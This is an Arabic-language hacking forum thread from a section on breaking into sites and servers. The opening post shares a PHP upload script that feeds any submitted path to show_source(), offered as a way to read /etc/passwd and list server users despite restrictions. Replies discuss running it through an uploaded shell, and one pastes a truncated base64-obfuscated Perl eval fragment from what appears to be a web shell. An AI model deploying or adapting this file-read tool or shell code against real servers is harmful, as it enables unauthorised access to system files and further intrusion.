:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Bypass Read /etc/passwd Via show_source Function (http://www.vbspiders.com/vb/t62718.html)

ViRuS_BaGhDaD 06-07-2012 08:21 AM
Bypass Read /etc/passwd Via show_source Function
 
الـسـلام عـلـيـكـم ورحـمـة الله وبـركـاتــه

مثل ما موضح بعنوان الموضوع

Bypass Read /etc/passwd By show_source Function

تخطي قرائه ملف /etc/passwd عن طريق داله الـ ()show_source

كتبت لكم كود بسيط جدا وبنفس الوقت احيانا يفيد في تخطي منع قرائه اليوزرات

ديناميكيه الكود تعتمد على استغلال احدى ثغرات السيرفر وهالداله نادرا ما يتم منعها في السيرفر

يعني ان شاء الله راح تضبط معاكم بنسبه 70%

والكود كمان بسيط جدا

كود PHP:
<title>Read /etc/passwd</title>
<font face="Times New Roman" size="6">BY Cyb3r-R00T</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec $_POST['passwd'];
if ($sec){
show_source ("$sec");
}
?>
ما يحتاج شرح

فقط ضع الملف الي تريد تقرا في المربع واضغط على Get !

وطبعا الملف راح يكون

/etc/passwd

اي استفسار جاهز

المــصــدر

http://www.sec-art.net/forum/231/

تحياتي للجميع.

cisco_security 06-07-2012 05:01 PM
رد: Bypass Read /etc/passwd Via show_source Function
 
الموضوع في المكان الخاطيء عزيزي

cisco_security 06-07-2012 05:07 PM
رد: Bypass Read /etc/passwd Via show_source Function
 
آسف هههههههههه
كاتب الرد لشخص آخر
بارك الله فيك يا غالي و في انتظار جديدك
تحياتي و آسف مره اخري

DR-HEX 06-09-2012 04:41 AM
رد: Bypass Read /etc/passwd Via show_source Function
 
شكراا اخي جاري تجريب والي عوده ان شاء الله

qasim 06-11-2012 09:51 PM
رد: Bypass Read /etc/passwd Via show_source Function
 
السلام عليكم

اخي الكريم لو ممكن الشرح بالصور او بالفيديووو

انا حطيت الكود في ملف في الشل

ومن ثم سويت الامر

/etc/passwd

وظهر خطأ او الفوربيدين

خالد سعودي 07-01-2012 02:26 AM
رد: Bypass Read /etc/passwd Via show_source Function
 
اخي انا تمام سويت رفعت كل شي بس تطلع صفحة بيضاء
فيها كتبه
ا #!/usr/bin/perl -I/usr/local/bandmin
use
MIME::Base64;
eval(decode_base64('IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci 9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6
IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbC BQVUJMSUMgIi0vL1czQy8vRFRE
IFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3 d3dy53My5vcmcvVFIveGh0bWwx
L0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIH htbG5zPSJodHRwOi8vd3d3Lncz
Lm9yZy8xOTk5L3hodG1sIj4KPGhlYWQ+CjxtZXRhIGh0dHAtZX F1aXY9IkNvbnRlbnQtTGFuZ3Vh
ممكن تزل شرح فيديو او بصورة

wail1616 07-24-2013 02:19 PM
رد: Bypass Read /etc/passwd Via show_source Function
 
شكرا اخي العزيز


الساعة الآن 02:01 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0